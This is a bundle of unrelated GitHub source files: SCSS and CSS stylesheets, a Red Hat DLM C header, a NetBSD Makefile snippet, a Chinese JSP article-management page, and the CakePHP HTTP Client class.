1.25em; display: inline-block; } #filter_container { float: right; margin: 0 2em 0 0; input { width: 10em; padding: 0.2em 0.5em; border: 2px solid $light-gray3; background: $light-bg; color: $light-fg; @include border-color-dark($dark-gray3); @include background-dark($dark-bg); @include color-dark($dark-fg); &:focus { border-color: $focus-color; } } } h2.stats { margin-top: .5em; font-size: 1em; } .stats button { font-family: inherit; font-size: inherit; border: 1px solid; border-radius: .2em; color: inherit; padding: .1em .5em; margin: 1px calc(.1em + 1px); cursor: pointer; border-color: $light-gray3; @include border-color-dark($dark-gray3); @include focus-border; @include focus-border; &.run { background: mix($light-run-bg, $light-bg, $off-button-lighten); @include background-dark($dark-run-bg); &.show_run { background: $light-run-bg; @include background-dark($dark-run-bg); border: 2px solid $run-color; margin: 0 .1em; } } &.mis { background: mix($light-mis-bg, $light-bg, $off-button-lighten); @include background-dark($dark-mis-bg); &.show_mis { background: $light-mis-bg; @include background-dark($dark-mis-bg); border: 2px solid $mis-color; margin: 0 .1em; } } &.exc { background: mix($light-exc-bg, $light-bg, $off-button-lighten); @include background-dark($dark-exc-bg); &.show_exc { background: $light-exc-bg; @include background-dark($dark-exc-bg); border: 2px solid $exc-color; margin: 0 .1em; } } &.par { background: mix($light-par-bg, $light-bg, $off-button-lighten); @include background-dark($dark-par-bg); &.show_par { background: $light-par-bg; @include background-dark($dark-par-bg); border: 2px solid $par-color; margin: 0 .1em; } } } // Yellow post-it things. %popup { display: none; position: absolute; z-index: 999; background: #ffffcc; border: 1px solid #888; border-radius: .2em; color: #333; padding: .25em .5em; } // Yellow post-it's in the text listings. 
%in-text-popup { @extend %popup; white-space: normal; float: right; top: 1.75em; right: 1em; height: auto; } // Help panel #keyboard_icon { float: right; margin: 5px; cursor: pointer; } .help_panel { @extend %popup; padding: .5em; border: 1px solid #883; .legend { font-style: italic; margin-bottom: 1em; } .indexfile & { width: 20em; min-height: 4em; } .pyfile & { width: 16em; min-height: 8em; } } #panel_icon { float: right; cursor: pointer; } .keyhelp { margin: .75em; .key { border: 1px solid black; border-color: #888 #333 #333 #888; padding: .1em .35em; font-family: $font-code; font-weight: bold; background: #eee; } } // Source file styles // The slim bar at the left edge of the source lines, colored by coverage. $border-indicator-width: .2em; #source { padding: 1em 0 1em $left-gutter; font-family: $font-code; p { // position relative makes position:absolute pop-ups appear in the right place. position: relative; white-space: pre; * { box-sizing: border-box; } .n { float: left; text-align: right; width: $left-gutter; box-sizing: border-box; margin-left: -$left-gutter; padding-right: 1em; color: $light-gray4; @include color-dark($dark-gray4); a { text-decoration: none; color: $light-gray4; @include color-dark($dark-gray4); &:hover { text-decoration: underline; color: $light-gray4; @include color-dark($dark-gray4); } } } &.highlight .n { background: #ffdd00; } .t { display: inline-block; width: 100%; box-sizing: border-box; margin-left: -.5em; padding-left: .5em - $border-indicator-width; border-left: $border-indicator-width solid $light-bg; @include border-color-dark($dark-bg); &:hover { background: mix($light-pln-bg, $light-fg, $hover-dark-amt); @include background-dark(mix($dark-pln-bg, $dark-fg, $hover-dark-amt)); & ~ .r .annotate.long { display: block; } } // Syntax coloring .com { color: $light-token-com; @include color-dark($dark-token-com); font-style: italic; line-height: 1px; } .key { font-weight: bold; line-height: 1px; } .str { color: $light-token-str; @include color-dark($dark-token-str); } } &.mis { .t { border-left: $border-indicator-width solid $mis-color; } &.show_mis .t { background: $light-mis-bg; @include background-dark($dark-mis-bg); &:hover { background: mix($light-mis-bg, $light-fg, $hover-dark-amt); @include background-dark(mix($dark-mis-bg, $dark-fg, $hover-dark-amt)); } } } &.run { .t { border-left: $border-indicator-width solid $run-color; } &.show_run .t { background: $light-run-bg; @include background-dark($dark-run-bg); &:hover { background: mix($light-run-bg, $light-fg, $hover-dark-amt); @include background-dark(mix($dark-run-bg, $dark-fg, $hover-dark-amt)); } } } &.exc { .t { border-left: $border-indicator-width solid $exc-color; } &.show_exc .t { background: $light-exc-bg; @include background-dark($dark-exc-bg); &:hover { background: mix($light-exc-bg, $light-fg, $hover-dark-amt); @include background-dark(mix($dark-exc-bg, $dark-fg, $hover-dark-amt)); } } } &.par { .t { border-left: $border-indicator-width solid $par-color; } &.show_par .t { background: $light-par-bg; @include background-dark($dark-par-bg); &:hover { background: mix($light-par-bg, $light-fg, $hover-dark-amt); @include background-dark(mix($dark-par-bg, $dark-fg, $hover-dark-amt)); } } } .r { position: absolute; top: 0; right: 2.5em; font-family: $font-normal; } .annotate { font-family: $font-normal; color: $light-gray5; @include color-dark($dark-gray6); padding-right: .5em; &.short:hover ~ .long { display: block; } &.long { @extend %in-text-popup; width: 30em; right: 2.5em; } } input { 
display: none; & ~ .r label.ctx { cursor: pointer; border-radius: .25em; &::before { content: "▶ "; } &:hover { background: mix($light-context-bg-color, $light-bg, $off-button-lighten); @include background-dark(mix($dark-context-bg-color, $dark-bg, $off-button-lighten)); color: $light-gray5; @include color-dark($dark-gray5); } } &:checked ~ .r label.ctx { background: $light-context-bg-color; @include background-dark($dark-context-bg-color); color: $light-gray5; @include color-dark($dark-gray5); border-radius: .75em .75em 0 0; padding: 0 .5em; margin: -.25em 0; &::before { content: "▼ "; } } &:checked ~ .ctxs { padding: .25em .5em; overflow-y: scroll; max-height: 10.5em; } } label.ctx { color: $light-gray4; @include color-dark($dark-gray4); display: inline-block; padding: 0 .5em; font-size: .8333em; // 10/12 } .ctxs { display: block; max-height: 0; overflow-y: hidden; transition: all .2s; padding: 0 .5em; font-family: $font-normal; white-space: nowrap; background: $light-context-bg-color; @include background-dark($dark-context-bg-color); border-radius: .25em; margin-right: 1.75em; span { display: block; text-align: right; } } } } // index styles #index { font-family: $font-code; font-size: 0.875em; table.index { margin-left: -.5em; } td, th { text-align: right; width: 5em; padding: .25em .5em; border-bottom: 1px solid $light-gray2; @include border-color-dark($dark-gray2); &.name { text-align: left; width: auto; } } th { font-style: italic; color: $light-gray6; @include color-dark($dark-gray6); cursor: pointer; &:hover { background: $light-gray2; @include background-dark($dark-gray2); } &.headerSortDown, &.headerSortUp { white-space: nowrap; background: $light-gray2; @include background-dark($dark-gray2); } &.headerSortDown:after { content: " ↑"; } &.headerSortUp:after { content: " ↓"; } } td.name a { text-decoration: none; color: inherit; } tr.total td, tr.total_dynamic td { font-weight: bold; border-top: 1px solid #ccc; border-bottom: none; } tr.file:hover { background: $light-gray2; @include background-dark($dark-gray2); td.name { text-decoration: underline; color: inherit; } } } // scroll marker styles #scroll_marker { position: fixed; right: 0; top: 0; width: 16px; height: 100%; background: $light-bg; border-left: 1px solid $light-gray2; @include background-dark($dark-bg); @include border-color-dark($dark-gray2); will-change: transform; // for faster scrolling of fixed element in Chrome .marker { background: $light-gray3; @include background-dark($dark-gray3); position: absolute; min-height: 3px; width: 100%; } }
{ "pile_set_name": "Github" }
// Google Code Prettify styles

.com { color: #999; }
.lit { color: #195f91; }
.pun, .opn, .clo { color: #93a1a1; }
.fun { color: #dc322f; }
.str, .atv { color: #C7254E; }
.kwd, .prettyprint .tag { color: #2F6F9F; }
.typ, .atn, .dec, .var { color: #428BCA; }
.pln { color: #333; }

.prettyprint {
  padding: 9px 14px;
  margin-bottom: 20px;
  margin-top: 20px;
  border: 1px solid #eee;

  &.linenums {
    -webkit-box-shadow: inset 40px 0 0 #fbfbfb, inset 41px 0 0 #f6f6f6;
    -moz-box-shadow: inset 40px 0 0 #fbfbfb, inset 41px 0 0 #f6f6f6;
    box-shadow: inset 40px 0 0 #fbfbfb, inset 41px 0 0 #f6f6f6;
  }
}

// Specify class=linenums on a pre to get line numbering
ol.linenums {
  margin: 0 0 0 -12px;

  li {
    padding-left: 12px;
    color: #bebebe;
    line-height: 18px;
  }
}
{ "pile_set_name": "Github" }
/******************************************************************************
*******************************************************************************
**
**  Copyright (C) 2005 Red Hat, Inc.  All rights reserved.
**
**  This copyrighted material is made available to anyone wishing to use,
**  modify, copy, or redistribute it subject to the terms and conditions
**  of the GNU General Public License v.2.
**
*******************************************************************************
******************************************************************************/

#ifndef __UTIL_DOT_H__
#define __UTIL_DOT_H__

void dlm_message_out(struct dlm_message *ms);
void dlm_message_in(struct dlm_message *ms);
void dlm_rcom_out(struct dlm_rcom *rc);
void dlm_rcom_in(struct dlm_rcom *rc);

#endif
{ "pile_set_name": "Github" }
# $NetBSD: Makefile.parselist,v 1.6 2008/10/19 22:05:20 apb Exp $
#
# Makefile snippet to setup parselist.awk related variables:
#	PARSELISTENV	environment variables to pass to parselist.awk
#			(may be appended to by caller)
#	PARSELISTDEP	dependency on parselist.awk
#	PARSELIST	run ${PARSELISTENV} awk -f ${PARSELISTDEP}
#

.if !defined(_MAKEFILE_PARSELIST_)
_MAKEFILE_PARSELIST_=1

PARSELISTENV+=	NETBSDSRCDIR=${NETBSDSRCDIR:Q} \
		CRUNCHBIN=${CRUNCHBIN:Q} \
		CURDIR=${.CURDIR:Q} \
		DESTDIR=${DESTDIR:Q} \
		DISTRIBDIR=${DISTRIBDIR:Q} \
		MACHINE=${MACHINE:Q} \
		MACHINE_ARCH=${MACHINE_ARCH:Q} \
		MAKE=${MAKE:Q} \
		OBJDIR=${.OBJDIR:Q}

PARSELISTDEP=	${DISTRIBDIR}/common/parselist.awk
PARSELIST=	${PARSELISTENV} ${TOOL_AWK} -f ${PARSELISTDEP}

.endif	# _MAKEFILE_PARSELIST_
{ "pile_set_name": "Github" }
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" %> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>articleManger</title> <link rel="stylesheet" type="text/css" href="${pageContext.request.contextPath}/jquery-easyui-1.3.3/themes/default/easyui.css"> <link rel="stylesheet" type="text/css" href="${pageContext.request.contextPath}/jquery-easyui-1.3.3/themes/icon.css"> <script type="text/javascript" src="${pageContext.request.contextPath}/jquery-easyui-1.3.3/jquery.min.js"></script> <script type="text/javascript" src="${pageContext.request.contextPath}/jquery-easyui-1.3.3/jquery.easyui.min.js"></script> <script type="text/javascript" src="${pageContext.request.contextPath}/jquery-easyui-1.3.3/locale/easyui-lang-zh_CN.js"></script> <script type="text/javascript" src="${pageContext.request.contextPath}/ueditor/ueditor.config.js"> </script> <script type="text/javascript" src="${pageContext.request.contextPath}/ueditor/ueditor.all.min.js"> </script> </head> <body style="margin:1px;" id="ff"> <table id="dg" title="文本信息管理" class="easyui-datagrid" pagination="true" rownumbers="true" fit="true" url="${pageContext.request.contextPath}/articles/datagrid" toolbar="#tb"> <thead data-options="frozen:true"> <tr> <th field="cb" checkbox="true" align="center"></th> <th field="id" width="10%" align="center" hidden="true">编号</th> <th field="articleTitle" width="200" align="center">标题</th> <th field="articleCreateDate" width="150" align="center">创建时间</th> <th field="addName" width="150" align="center">添加人</th> <th field="content" width="70" align="center" formatter="formatHref">操作 </th> </tr> </thead> </table> <div id="tb"> <div> <a href="javascript:openArticleAddDialog()" class="easyui-linkbutton" iconCls="icon-add" plain="true">添加</a> <a href="javascript:openArticleModifyDialog()" class="easyui-linkbutton" iconCls="icon-edit" plain="true">修改</a> <a href="javascript:deleteArticle()" class="easyui-linkbutton" iconCls="icon-remove" plain="true">删除</a> </div> <div> &nbsp;标题:&nbsp;<input type="text" id="articleTitle" size="20" onkeydown="if(event.keyCode==13) searchArticle()"/>&nbsp; <a href="javascript:searchArticle()" class="easyui-linkbutton" iconCls="icon-search" plain="true">搜索</a> </div> </div> <div id="dlg" class="easyui-dialog" style="width: 850px;height:555px;padding: 10px 20px; position: relative; z-index:1000;" closed="true" buttons="#dlg-buttons"> <form id="fm" method="post"> <table cellspacing="8px"> <tr> <td>标题:</td> <td><input type="text" id="title" name="articleTitle" class="easyui-validatebox" required="true"/>&nbsp;<font color="red">*</font> <input id="articleIdfm" name="id" type="hidden" value="0"> </td> </tr> <tr> <td>添加人:</td> <td><input type="text" id="addName" name="addName"/> </td> </tr> <tr> <td>详细内容</td> <td id="editor"> </td> </tr> </table> </form> </div> <div id="dlg-buttons"> <a href="javascript:saveArticle()" class="easyui-linkbutton" iconCls="icon-ok">保存</a> <a href="javascript:closeArticleDialog()" class="easyui-linkbutton" iconCls="icon-cancel">关闭</a> </div> <script type="text/javascript"> var url = "${pageContext.request.contextPath}/articles"; var method; function ResetEditor() { UE.getEditor('myEditor', { initialFrameHeight: 480, initialFrameWidth: 660, enableAutoSave: false, elementPathEnabled: false, wordCount: false, /* toolbars: [ [ 'fontfamily', 'fontsize', 'forecolor', 'backcolor', 'bold', 
'italic', 'underline', '|', 'link', '|', ] ] */ }); } function searchArticle() { $("#dg").datagrid('load', { "articleTitle": $("#articleTitle").val(), }); } function deleteArticle() { var selectedRows = $("#dg").datagrid('getSelections'); if (selectedRows.length == 0) { $.messager.alert("系统提示", "请选择要删除的数据!"); return; } var strIds = []; for (var i = 0; i < selectedRows.length; i++) { strIds.push(selectedRows[i].id); } var ids = strIds.join(","); $.messager .confirm( "系统提示", "您确认要删除这<font color=red>" + selectedRows.length + "</font>条数据吗?", function (r) { if (r) { $.ajax({ type: "DELETE",//方法类型 dataType: "json",//预期服务器返回的数据类型 url: "/articles/" + ids,//url data: {}, success: function (result) { console.log(result);//打印服务端返回的数据 if (result.resultCode == 200) { $.messager.alert( "系统提示", "数据已成功删除!"); $("#dg").datagrid( "reload"); } else { $.messager.alert( "系统提示", "数据删除失败!"); } ; }, error: function () { $.messager.alert("ERROR!"); } }); } }); } function openArticleAddDialog() { var html = '<div id="myEditor" name="articleContent"></div>'; $('#editor').append(html); ResetEditor(editor); var ue = UE.getEditor('myEditor'); ue.setContent(""); $("#dlg").dialog("open").dialog("setTitle", "添加文本信息"); method = "POST"; } function saveArticle() { var title = $("#title").val(); var addName = $("#addName").val(); var content = UE.getEditor('myEditor').getContent(); var id = $("#articleIdfm").val(); var data = {"id": id, "articleTitle": title, "articleContent": content, "addName": addName} $.ajax({ type: method,//方法类型 dataType: "json",//预期服务器返回的数据类型 url: url,//url contentType: "application/json; charset=utf-8", data: JSON.stringify(data), success: function (result) { console.log(result);//打印服务端返回的数据 if (result.resultCode == 200) { $.messager.alert("系统提示", "保存成功"); $("#dlg").dialog("close"); $("#dg").datagrid("reload"); resetValue(); } else { $.messager.alert("系统提示", "操作失败"); $("#dlg").dialog("close"); resetValue(); } ; }, error: function () { $.messager.alert("系统提示", "操作失败"); } }); } function openArticleModifyDialog() { var selectedRows = $("#dg").datagrid('getSelections'); if (selectedRows.length != 1) { $.messager.alert("系统提示", "请选择一条要编辑的数据!"); return; } var row = selectedRows[0]; $("#dlg").dialog("open").dialog("setTitle", "修改信息"); $('#fm').form('load', row); var html = '<div id="myEditor" name="articleContent"></div>'; $('#editor').append(html); ResetEditor(editor); var ue = UE.getEditor('myEditor'); ue.setContent(row.articleContent); method = "PUT"; $("#articleIdfm").val(row.id); } function formatHref(val, row) { return "<a href='${pageContext.request.contextPath}/article.html?id=" + row.id + "' target='_blank'>查看详情</a>"; } function resetValue() { $("#title").val(""); $("#addName").val(""); $("#container").val(""); ResetEditor(); } function closeArticleDialog() { $("#dlg").dialog("close"); resetValue(); } </script> </body> </html>
{ "pile_set_name": "Github" }
<?php declare(strict_types=1); /** * CakePHP(tm) : Rapid Development Framework (https://cakephp.org) * Copyright (c) Cake Software Foundation, Inc. (https://cakefoundation.org) * * Licensed under The MIT License * Redistributions of files must retain the above copyright notice. * * @copyright Copyright (c) Cake Software Foundation, Inc. (https://cakefoundation.org) * @link https://cakephp.org CakePHP(tm) Project * @since 3.0.0 * @license https://opensource.org/licenses/mit-license.php MIT License */ namespace Cake\Http; use Cake\Core\App; use Cake\Core\Exception\Exception; use Cake\Core\InstanceConfigTrait; use Cake\Http\Client\Adapter\Curl; use Cake\Http\Client\Adapter\Stream; use Cake\Http\Client\AdapterInterface; use Cake\Http\Client\Request; use Cake\Http\Client\Response; use Cake\Http\Cookie\CookieCollection; use Cake\Http\Cookie\CookieInterface; use Cake\Utility\Hash; use InvalidArgumentException; use Laminas\Diactoros\Uri; use Psr\Http\Client\ClientInterface; use Psr\Http\Message\RequestInterface; use Psr\Http\Message\ResponseInterface; /** * The end user interface for doing HTTP requests. * * ### Scoped clients * * If you're doing multiple requests to the same hostname it's often convenient * to use the constructor arguments to create a scoped client. This allows you * to keep your code DRY and not repeat hostnames, authentication, and other options. * * ### Doing requests * * Once you've created an instance of Client you can do requests * using several methods. Each corresponds to a different HTTP method. * * - get() * - post() * - put() * - delete() * - patch() * * ### Cookie management * * Client will maintain cookies from the responses done with * a client instance. These cookies will be automatically added * to future requests to matching hosts. Cookies will respect the * `Expires`, `Path` and `Domain` attributes. You can get the client's * CookieCollection using cookies() * * You can use the 'cookieJar' constructor option to provide a custom * cookie jar instance you've restored from cache/disk. By default * an empty instance of Cake\Http\Client\CookieCollection will be created. * * ### Sending request bodies * * By default any POST/PUT/PATCH/DELETE request with $data will * send their data as `application/x-www-form-urlencoded` unless * there are attached files. In that case `multipart/form-data` * will be used. * * When sending request bodies you can use the `type` option to * set the Content-Type for the request: * * ``` * $http->get('/users', [], ['type' => 'json']); * ``` * * The `type` option sets both the `Content-Type` and `Accept` header, to * the same mime type. When using `type` you can use either a full mime * type or an alias. If you need different types in the Accept and Content-Type * headers you should set them manually and not use `type` * * ### Using authentication * * By using the `auth` key you can use authentication. The type sub option * can be used to specify which authentication strategy you want to use. * CakePHP comes with a few built-in strategies: * * - Basic * - Digest * - Oauth * * ### Using proxies * * By using the `proxy` key you can set authentication credentials for * a proxy if you need to use one. The type sub option can be used to * specify which authentication strategy you want to use. * CakePHP comes with built-in support for basic authentication. */ class Client implements ClientInterface { use InstanceConfigTrait; /** * Default configuration for the client. 
* * @var array */ protected $_defaultConfig = [ 'adapter' => null, 'host' => null, 'port' => null, 'scheme' => 'http', 'timeout' => 30, 'ssl_verify_peer' => true, 'ssl_verify_peer_name' => true, 'ssl_verify_depth' => 5, 'ssl_verify_host' => true, 'redirect' => false, 'protocolVersion' => '1.1', ]; /** * List of cookies from responses made with this client. * * Cookies are indexed by the cookie's domain or * request host name. * * @var \Cake\Http\Cookie\CookieCollection */ protected $_cookies; /** * Adapter for sending requests. * * @var \Cake\Http\Client\AdapterInterface */ protected $_adapter; /** * Create a new HTTP Client. * * ### Config options * * You can set the following options when creating a client: * * - host - The hostname to do requests on. * - port - The port to use. * - scheme - The default scheme/protocol to use. Defaults to http. * - timeout - The timeout in seconds. Defaults to 30 * - ssl_verify_peer - Whether or not SSL certificates should be validated. * Defaults to true. * - ssl_verify_peer_name - Whether or not peer names should be validated. * Defaults to true. * - ssl_verify_depth - The maximum certificate chain depth to traverse. * Defaults to 5. * - ssl_verify_host - Verify that the certificate and hostname match. * Defaults to true. * - redirect - Number of redirects to follow. Defaults to false. * - adapter - The adapter class name or instance. Defaults to * \Cake\Http\Client\Adapter\Curl if `curl` extension is loaded else * \Cake\Http\Client\Adapter\Stream. * - protocolVersion - The HTTP protocol version to use. Defaults to 1.1 * * @param array $config Config options for scoped clients. * @throws \InvalidArgumentException */ public function __construct(array $config = []) { $this->setConfig($config); $adapter = $this->_config['adapter']; if ($adapter === null) { $adapter = Curl::class; if (!extension_loaded('curl')) { $adapter = Stream::class; } } else { $this->setConfig('adapter', null); } if (is_string($adapter)) { $adapter = new $adapter(); } if (!$adapter instanceof AdapterInterface) { throw new InvalidArgumentException('Adapter must be an instance of Cake\Http\Client\AdapterInterface'); } $this->_adapter = $adapter; if (!empty($this->_config['cookieJar'])) { $this->_cookies = $this->_config['cookieJar']; $this->setConfig('cookieJar', null); } else { $this->_cookies = new CookieCollection(); } } /** * Get the cookies stored in the Client. * * @return \Cake\Http\Cookie\CookieCollection */ public function cookies(): CookieCollection { return $this->_cookies; } /** * Adds a cookie to the Client collection. * * @param \Cake\Http\Cookie\CookieInterface $cookie Cookie object. * @return $this * @throws \InvalidArgumentException */ public function addCookie(CookieInterface $cookie) { if (!$cookie->getDomain() || !$cookie->getPath()) { throw new InvalidArgumentException('Cookie must have a domain and a path set.'); } $this->_cookies = $this->_cookies->add($cookie); return $this; } /** * Do a GET request. * * The $data argument supports a special `_content` key * for providing a request body in a GET request. This is * generally not used, but services like ElasticSearch use * this feature. * * @param string $url The url or path you want to request. * @param array|string $data The query data you want to send. * @param array $options Additional options for the request. 
* @return \Cake\Http\Client\Response */ public function get(string $url, $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $body = null; if (is_array($data) && isset($data['_content'])) { $body = $data['_content']; unset($data['_content']); } $url = $this->buildUrl($url, $data, $options); return $this->_doRequest( Request::METHOD_GET, $url, $body, $options ); } /** * Do a POST request. * * @param string $url The url or path you want to request. * @param mixed $data The post data you want to send. * @param array $options Additional options for the request. * @return \Cake\Http\Client\Response */ public function post(string $url, $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $url = $this->buildUrl($url, [], $options); return $this->_doRequest(Request::METHOD_POST, $url, $data, $options); } /** * Do a PUT request. * * @param string $url The url or path you want to request. * @param mixed $data The request data you want to send. * @param array $options Additional options for the request. * @return \Cake\Http\Client\Response */ public function put(string $url, $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $url = $this->buildUrl($url, [], $options); return $this->_doRequest(Request::METHOD_PUT, $url, $data, $options); } /** * Do a PATCH request. * * @param string $url The url or path you want to request. * @param mixed $data The request data you want to send. * @param array $options Additional options for the request. * @return \Cake\Http\Client\Response */ public function patch(string $url, $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $url = $this->buildUrl($url, [], $options); return $this->_doRequest(Request::METHOD_PATCH, $url, $data, $options); } /** * Do an OPTIONS request. * * @param string $url The url or path you want to request. * @param mixed $data The request data you want to send. * @param array $options Additional options for the request. * @return \Cake\Http\Client\Response */ public function options(string $url, $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $url = $this->buildUrl($url, [], $options); return $this->_doRequest(Request::METHOD_OPTIONS, $url, $data, $options); } /** * Do a TRACE request. * * @param string $url The url or path you want to request. * @param mixed $data The request data you want to send. * @param array $options Additional options for the request. * @return \Cake\Http\Client\Response */ public function trace(string $url, $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $url = $this->buildUrl($url, [], $options); return $this->_doRequest(Request::METHOD_TRACE, $url, $data, $options); } /** * Do a DELETE request. * * @param string $url The url or path you want to request. * @param mixed $data The request data you want to send. * @param array $options Additional options for the request. * @return \Cake\Http\Client\Response */ public function delete(string $url, $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $url = $this->buildUrl($url, [], $options); return $this->_doRequest(Request::METHOD_DELETE, $url, $data, $options); } /** * Do a HEAD request. * * @param string $url The url or path you want to request. * @param array $data The query string data you want to send. * @param array $options Additional options for the request. 
* @return \Cake\Http\Client\Response */ public function head(string $url, array $data = [], array $options = []): Response { $options = $this->_mergeOptions($options); $url = $this->buildUrl($url, $data, $options); return $this->_doRequest(Request::METHOD_HEAD, $url, '', $options); } /** * Helper method for doing non-GET requests. * * @param string $method HTTP method. * @param string $url URL to request. * @param mixed $data The request body. * @param array $options The options to use. Contains auth, proxy, etc. * @return \Cake\Http\Client\Response */ protected function _doRequest(string $method, string $url, $data, $options): Response { $request = $this->_createRequest( $method, $url, $data, $options ); return $this->send($request, $options); } /** * Does a recursive merge of the parameter with the scope config. * * @param array $options Options to merge. * @return array Options merged with set config. */ protected function _mergeOptions(array $options): array { return Hash::merge($this->_config, $options); } /** * Sends a PSR-7 request and returns a PSR-7 response. * * @param \Psr\Http\Message\RequestInterface $request Request instance. * @return \Psr\Http\Message\ResponseInterface Response instance. * @throws \Psr\Http\Client\ClientExceptionInterface If an error happens while processing the request. */ public function sendRequest(RequestInterface $request): ResponseInterface { return $this->send($request, $this->_config); } /** * Send a request. * * Used internally by other methods, but can also be used to send * handcrafted Request objects. * * @param \Psr\Http\Message\RequestInterface $request The request to send. * @param array $options Additional options to use. * @return \Cake\Http\Client\Response */ public function send(RequestInterface $request, array $options = []): Response { $redirects = 0; if (isset($options['redirect'])) { $redirects = (int)$options['redirect']; unset($options['redirect']); } do { $response = $this->_sendRequest($request, $options); $handleRedirect = $response->isRedirect() && $redirects-- > 0; if ($handleRedirect) { $url = $request->getUri(); $location = $response->getHeaderLine('Location'); $locationUrl = $this->buildUrl($location, [], [ 'host' => $url->getHost(), 'port' => $url->getPort(), 'scheme' => $url->getScheme(), 'protocolRelative' => true, ]); $request = $request->withUri(new Uri($locationUrl)); $request = $this->_cookies->addToRequest($request, []); } } while ($handleRedirect); return $response; } /** * Send a request without redirection. * * @param \Psr\Http\Message\RequestInterface $request The request to send. * @param array $options Additional options to use. * @return \Cake\Http\Client\Response */ protected function _sendRequest(RequestInterface $request, array $options): Response { $responses = $this->_adapter->send($request, $options); foreach ($responses as $response) { $this->_cookies = $this->_cookies->addFromResponse($response, $request); } return array_pop($responses); } /** * Generate a URL based on the scoped client options. * * @param string $url Either a full URL or just the path. * @param string|array $query The query data for the URL. * @param array $options The config options stored with Client::config() * @return string A complete url with scheme, port, host, and path. */ public function buildUrl(string $url, $query = [], array $options = []): string { if (empty($options) && empty($query)) { return $url; } if ($query) { $q = strpos($url, '?') === false ? '?' : '&'; $url .= $q; $url .= is_string($query) ? 
$query : http_build_query($query); } $defaults = [ 'host' => null, 'port' => null, 'scheme' => 'http', 'protocolRelative' => false, ]; $options += $defaults; if ($options['protocolRelative'] && preg_match('#^//#', $url)) { $url = $options['scheme'] . ':' . $url; } if (preg_match('#^https?://#', $url)) { return $url; } $defaultPorts = [ 'http' => 80, 'https' => 443, ]; $out = $options['scheme'] . '://' . $options['host']; if ($options['port'] && (int)$options['port'] !== $defaultPorts[$options['scheme']]) { $out .= ':' . $options['port']; } $out .= '/' . ltrim($url, '/'); return $out; } /** * Creates a new request object based on the parameters. * * @param string $method HTTP method name. * @param string $url The url including query string. * @param mixed $data The request body. * @param array $options The options to use. Contains auth, proxy, etc. * @return \Cake\Http\Client\Request */ protected function _createRequest(string $method, string $url, $data, $options): Request { $headers = (array)($options['headers'] ?? []); if (isset($options['type'])) { $headers = array_merge($headers, $this->_typeHeaders($options['type'])); } if (is_string($data) && !isset($headers['Content-Type']) && !isset($headers['content-type'])) { $headers['Content-Type'] = 'application/x-www-form-urlencoded'; } $request = new Request($url, $method, $headers, $data); /** @var \Cake\Http\Client\Request $request */ $request = $request->withProtocolVersion($this->getConfig('protocolVersion')); $cookies = $options['cookies'] ?? []; /** @var \Cake\Http\Client\Request $request */ $request = $this->_cookies->addToRequest($request, $cookies); if (isset($options['auth'])) { $request = $this->_addAuthentication($request, $options); } if (isset($options['proxy'])) { $request = $this->_addProxy($request, $options); } return $request; } /** * Returns headers for Accept/Content-Type based on a short type * or full mime-type. * * @param string $type short type alias or full mimetype. * @return string[] Headers to set on the request. * @throws \Cake\Core\Exception\Exception When an unknown type alias is used. * @psalm-return array{Accept: string, Content-Type: string} */ protected function _typeHeaders(string $type): array { if (strpos($type, '/') !== false) { return [ 'Accept' => $type, 'Content-Type' => $type, ]; } $typeMap = [ 'json' => 'application/json', 'xml' => 'application/xml', ]; if (!isset($typeMap[$type])) { throw new Exception("Unknown type alias '$type'."); } return [ 'Accept' => $typeMap[$type], 'Content-Type' => $typeMap[$type], ]; } /** * Add authentication headers to the request. * * Uses the authentication type to choose the correct strategy * and use its methods to add headers. * * @param \Cake\Http\Client\Request $request The request to modify. * @param array $options Array of options containing the 'auth' key. * @return \Cake\Http\Client\Request The updated request object. */ protected function _addAuthentication(Request $request, array $options): Request { $auth = $options['auth']; /** @var \Cake\Http\Client\Auth\Basic $adapter */ $adapter = $this->_createAuth($auth, $options); return $adapter->authentication($request, $options['auth']); } /** * Add proxy authentication headers. * * Uses the authentication type to choose the correct strategy * and use its methods to add headers. * * @param \Cake\Http\Client\Request $request The request to modify. * @param array $options Array of options containing the 'proxy' key. * @return \Cake\Http\Client\Request The updated request object. 
*/ protected function _addProxy(Request $request, array $options): Request { $auth = $options['proxy']; /** @var \Cake\Http\Client\Auth\Basic $adapter */ $adapter = $this->_createAuth($auth, $options); return $adapter->proxyAuthentication($request, $options['proxy']); } /** * Create the authentication strategy. * * Use the configuration options to create the correct * authentication strategy handler. * * @param array $auth The authentication options to use. * @param array $options The overall request options to use. * @return object Authentication strategy instance. * @throws \Cake\Core\Exception\Exception when an invalid strategy is chosen. */ protected function _createAuth(array $auth, array $options) { if (empty($auth['type'])) { $auth['type'] = 'basic'; } $name = ucfirst($auth['type']); $class = App::className($name, 'Http/Client/Auth'); if (!$class) { throw new Exception( sprintf('Invalid authentication type %s', $name) ); } return new $class($this, $options); } }
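// A minimal usage sketch of this client, based only on the options documented
// in the class docblock above (scoped clients, the `type` option and the
// `auth` option). The host, credentials and endpoint paths are placeholders,
// the POST payload is illustrative, and getJson() is provided by
// Cake\Http\Client\Response (defined elsewhere in the framework). Such calls
// would normally live in application code rather than in this file.

// A scoped client: host, scheme and timeout are reused for every request.
$http = new \Cake\Http\Client([
    'host' => 'api.example.com', // placeholder host
    'scheme' => 'https',
    'timeout' => 10,
]);

// GET with query data; 'type' => 'json' sets both Accept and Content-Type.
$response = $http->get('/users', ['page' => 1], ['type' => 'json']);
$users = $response->getJson();

// POST with basic authentication, one of the built-in auth strategies.
$response = $http->post('/users', ['name' => 'ada'], [
    'type' => 'json',
    'auth' => ['type' => 'basic', 'username' => 'user', 'password' => 'secret'],
]);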
{ "pile_set_name": "Github" }
